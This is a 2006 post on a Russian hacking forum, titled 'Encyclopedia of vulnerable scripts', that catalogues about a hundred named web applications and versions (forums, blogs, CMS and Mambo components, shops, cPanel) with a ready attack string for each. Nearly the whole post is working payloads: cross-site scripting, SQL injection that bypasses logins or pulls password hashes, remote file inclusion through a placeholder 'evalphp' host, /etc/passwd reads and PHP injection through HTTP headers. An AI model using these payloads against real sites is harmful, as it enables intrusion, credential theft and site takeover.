Тема: Энциклопедия уязвимых скриптов
Показать сообщение отдельно

Update
  #3  
Старый 05.11.2006, 13:51
Аватар для DIAgen
DIAgen
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332

Репутация: 1276


По умолчанию Update
Код:
Форумы
phpBB v.1.20 локальный инклуид
/admin/admin_hacks_list.php?setmodules=3D1&board_conf=ig[default_lang]=3Denglish&phpEx=3D${random}
MyBulletinBoard v.1.1.5 SQL инъекция
http://www.milw0rm.com/exploits/2012
dotNetBB v2.42EC.SP3 XSS
/iforget.aspx POST em=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E
Toast Forums v.1.6 XSS
?action=posts&sub=search&fid-1&author=r0t&subject=%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E%3C
SKForum v.1.5 XSS
?areaID=%3Cscript%3Ealert('XSS')%3B%3C/script%3E&time=%3Cscript%3Ealert('XSS')%3B%3C/script%3E
Invision Power Board v.2.0.3 XSS
Шаг 1
?act=Search&CODE=01 
POST
keywords=test&namesearch=&forums%5B%5D=all&searchsubs=1&prune=0&prune_type=newer&sort_key=last_post&sort_order=desc&search_in=posts&result_type=topics
Шаг 2
GET
%2F%24%7B%69%6E%63%6C%75%73%69%6F%6E%5F%70%61%72%61%6D%65%74%65%72%73%7D%3D%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%78%73%73%74%65%73%74%22%29%3B%3C%2F%73%63%72%69%70%74%3E
Invision Power Board v2.1.6 SQL инъекция
CLIENT-IP: ' UNION SELECT 'test',1,1,1/*
WWWThreads Forum XSS
calendar.php?week=%22%3E%3Cscript%3Ealert(${random})%3C/script%3E
MercuryBoard v.1.1.4 SQL инъекция
?a=active - User-Agent: 123456'
Integramod Portal  v.2.0 локальный инклуид
?phpbb_root_path=http://evalphp

Календари и Планировщики
WebCalendar v.4.0 SQL инъекция
?EventID=arbitrary_id%20or%20sql_injection_tet=test
Connect Daily v.3.2.9  XSS
?start=<script>alert("XSS");</script>
Thyme v.1.3 XSS
POST searchfor=%3Cscript%3Ealert%28%22${random}%22%29%3B%3C%2Fscript%3E
MaxxSchedule v.1.0 XSS
?Error=<script>alert("XSS");</script>
MultiCalendars v.3.0  SQL инъекция
?calsids=sql_error
myEvent v.1.4 php инклуид
?myevent_path=http://evalphp?
TeamCal Pro v.2.8.001 локальный инклуид
?tc_config[app_root]=http://evalphp?

Блоки новостей
myBloggie v.2.1.4 SQL инъекция
POST title='generate_error)/*&url=http://
Simplog v.0.9.1 Локальный инклуид
?cmd=ls%20-la&s=http://evalphp%00
Cute News v.1.4.5 XSS
?dosearch=yes&title="><script>alert("XSS");</script>&user=&from_date_day=&from_date_month=&from_date_year=&to_date_day =&to_date_month=&to_date_year=
WordPress v.2.0.3 SQL инъекци
?paged=-1
Simple PHP Blog v.0.4.7.1 Локальный инклуид
?blog_language=../../../../../../../../../../../inexistent_directory/inexistent_file.php%00
EasyMoblog v.0.5.1 XSS
?i=nothing.txt%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E%3Cimg%20src=%22img/posts/nothing.txt%22
bMachine v.2.9b XSS
POST key=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E%3C
Artmedic Newsletter v.4.1.2 Выполнение php
?logfile=info.php&logtime=000060&email=%3C?php%20echo%20md5(%22test%22);%20?%3E
Eggblog v.3.6 SQL инъекция
?id='1234567
pppBlog v.0.3.8 Локальный инклуид
?files[0]=../config/admin.php
BLOG:CMS v4.0.0 SQL инъекция
?id=9999999'/**/UNION/**/SELECT/**/mpassword/**/FROM/**/nucleus_member/**/WHERE/**/mnumber=1/*
DeluxeBB v1.08 SQL инъекция
Cookie: membercookie=test;memberid=1;memberpw=')or isnull(1/0) or(1='

Различные скрипты (редкие)
Digital Scribe 1.4 SQL
POST username=%22+or+isnull%281%2F0%29+%2F*&pass1=&submit=Login
ATUTOR 1.5.1 SQL
POST form_password_reminder=true&form_email=%27
PHP Advanced Transfer Manager System Disclosure
?filename=../../../../../../../../../../etc/passwd%00
Gcards v.1.45 SQL
username=%27+or+isnull%281%2F0%29%2F*&userpass=%27+or+isnull%281%2F0%29%2F*
PHPGreetz 0.99 Инклуид
?content=http://evalphp/
eFiction 1.1 SQL-XSS
?action=viewlist&let='%20UNION%20SELECT%200,0,'%3Cscript%3Ealert(%22XSS%22)%3C/script%3E',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*
DoceboLMS 2.04 Инклуид
?Command=GetFoldersAndFiles&Type=../../../../../../../../&CurrentFolder=
Enterprise Connector v.1.02  SQL
POST loginid='or isnull(1/0) /*
PhpGedView v.3.3.7 Инклуид
?PGV_BASE_DIRECTORY=../../../../../../../../../etc/passwd
PHPjournaler v.1.0 SQL
?readold=999%20union%20select%201,password,3,4,name,6%20from%20eronated_table_name/*
PHPStatus v.1.0 SQL
POST username=%27or+isnull%281%2F0%29+%2F*&password=anypassword&submit=Login
NetOffice v.2.5.3-pl1 SQL
POST loginForm=%27+or+acuerro%3D1%2F*&send=Send
phpListPro v.2.0.0  Инклуид
?returnpath=http:/evalphp%00
phpWebFTP v.3.2 Локальный инклуид
POST server=&port=21&user=qqq&password=qqq&language=../../../../../../../../../../etc/passwd%00
EDirectoryPro 2006-05-09 SQL
?Category=all&keyword=sql_error%27&mode=date
Timesheet PHP 1.2.1 SQL
POST redirect=%2Ftest%2Ftimesheet_1_2_1%2Fcalendar.php&username=testuser%27&password=testpassword%27&Login=submit
Web-News v.1.6.3 Инклуид
?content_page=http://evalphp?

Faq Systems
Absolute FAQ Manager v.4.0  XSS
POST topicid=1&question=%3Cscript%3Ealert%28%22$XSS%22%29%3B%3C%2Fscript%3E&imageField.x=14&imageField.y=6
PHPKB v.1.5 XSS
POST searchkeyword=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&category=0&Submit=Search+Knowledge+Base

Web Portals
SQuery v.4.5 (phpNuke module) Инклуид
?libpath=http://evalphp?

Партнерские системы
PHPCollab v.2.4 SQL
POST loginForm=%27error%27+or+error
Tiki Wiki v.1.9.3.1 XSS
?days=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert(%22XSS%22);%3C/scr%3C/script%3Eipt%3E%3E
DokuWiki v.2006-03-09b dwpage.php php-eval
X-FORWARDED-FOR: <?php echo md5("acunetix_test_text");?>

Administration Tools
Confixx 3 Professional v.3.1.2 SQL
?SID='%22
Pivot v1.30 RC2 
edit_new.php?Paths[extensions_path]=ftp://username:password@somehost.com/
edit_new.php?Paths[extensions_path]=/etc/passwd%00
blogroll.php?fg=[XSS]
blogroll.php?line1=[XSS]
blogroll.php?line2=[XSS]
blogroll.php?bg=[XSS]
blogroll.php?c1=[XSS]
blogroll.php?c2=[XSS]
blogroll.php?c3=[XSS]
blogroll.php?c4=[XSS]
editor/edit_menu.php?name=[XSS]
editor/edit_menu.php?js_name=[XSS]
photo.php?h=><script>alert(document.cookie)</script>
photo.php?w=><script>alert(document.cookie)</script> 
cPanel v.10.8.2.118 XSS
?dir=%3E%3Cscript%3Ealert(XSS)%3C/script%3E

CMS Systems
Simpleboard v1.1.0 (Mambo component) Инклуид
?sbp=http://evalphp?
Tim-online PHPBB v1.2.4RC3 (Mambo component) Инклуид
?phpbb_root_path=http://evalphp?
Galleria v1.0 (Mambo component) Инклуид
?mosConfig_absolute_path=http://evalphp?
Pearl For Mambo v.1.6  Инклуид
?GlobalSettings[templatesDirectory]=http://evalphp?
Videodb (Mambo component) v.0.3 Инклуид
?mosConfig_absolute_path=http://evalphp?
Loudmouth (Mambo component)  v.4.0 Инклуид
?mosConfig_absolute_path=http://evalphp?
Mambo up to v.4.6.1 SQL
Cookie: usercookie[password]=%27 or 1=1/*; usercookie[username]=admin
99articles Инклуид
?page=http://evalphp?
OpenPHPNuke v.2.3.3 Инклуид
?root_path=http://evalphp?
Ottoman  v.1.1.2 Локальный инклуид
?default_path=path%00
Ajax Portal v.3.0 SQL
POST rs=searchBoxes&rst=&rsrnd=1152608713921&rsargs[]=search%20%25%27%29%20LIMIT%200%20UNION%20SELECT%201337%2Cusername%2Cpassword%2Cgenerate_error%20FROM%20p${random}/*&rsargs[]=all&rsargs[]=0
MyPHP CMS v.0.3 Инклуид
?installed=23&domain=http://evalphp?
Plume CMS v1.3 Инклуид
?_PX_config[manager_path]=http://evalphp?
SmartSiteCMS v1.0  Инклуид
?root=http://evalphp?
GeekLog v1.4.0 Инклуид
?_CONF[path]=http://evalphp?
Etomite CMS v.0.6.1 SQL
POST rememberme=1&location&username=99999999$'/**/UNION/**/SELECT/**/0,'acunetixtest',MD5('acunetixtest'),0,0,0,0,0,0,0,0,0,0,0,0,0,0/*&password=acunetixtest&thing&submit=Login&licenseOK=1
SaveWebPortal v.3.4 Инклуид
?SITE_Path=http://evalphp?
phpFullAnnu v.5.1 Инклуид
?repmod=http://evalphp?

Gallery Applications
JetPhoto Server v.1.x XSS
?name=%22%3E%3Cscript%3Ealert(XSS);%3C/script%3E
photokorn v.1.542 SQL
?action=showgal&cat=[sql]
PhotoPost v.4.6 Инклуид
?PP_PATH=http://evalphp?

Development Tools
Mantis 1.00 Локальный инклуид
?t_core_path=../../../../../../../../etc/passwd%00
Flyspray 0.9.8 XSS
?tasks=all"><script>alert("XSS")</script>&project=0
Gemini v.2.0 XSS
?rtcDescription$RadEditor1=1><script>alert(XSS);</script>
paBugs v.2.0b3 Инклуид 
?path_to_bt_dir=http://evalphp?

Электронная коммерция
QuickEStore v.7.9 SQL
?CFID=&CFTOKEN=&CategoryID=[sql]
Leadhound 2006-04-28  XSS
?login=<script>alert("XSS");</script>
SunShop Shopping Cart v.3.5 XSS
?action=item&id=%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
OrbitHYIP v.2.0 XSS
?referral=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22XSS%22%29%3B%3C%2F%73%63%72%69%70%74%3E
CyberBuild 06.05.03 XSS
?SessionID=[%22%3E%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
PhpHostBot v.1.0 Инклуид
?page=http://evalphp?
PHP Simple Shop v.2.0 Инклуид
?abs_path=http://evalphp?
CubeCart v.2.0.7 XSS
?la_pow_by=%3Cscript%3Ealert(XSS)%3C/script%3E
osCommerce v.2.2 XSS
?zone=%3Cscript%3Ealert(XSS)%3C/script%3E

Ну тут уже так себе, не чего особеного нет!!!
Creative Community Portal v.1.1 SQL
?article_id='
WoWRoster v.1.5.0 Инклуид
?subdir=http://evalphp?
Popper v.1.41.r2 Инклуид
?form=http://evalphp?
 
Ответить с цитированием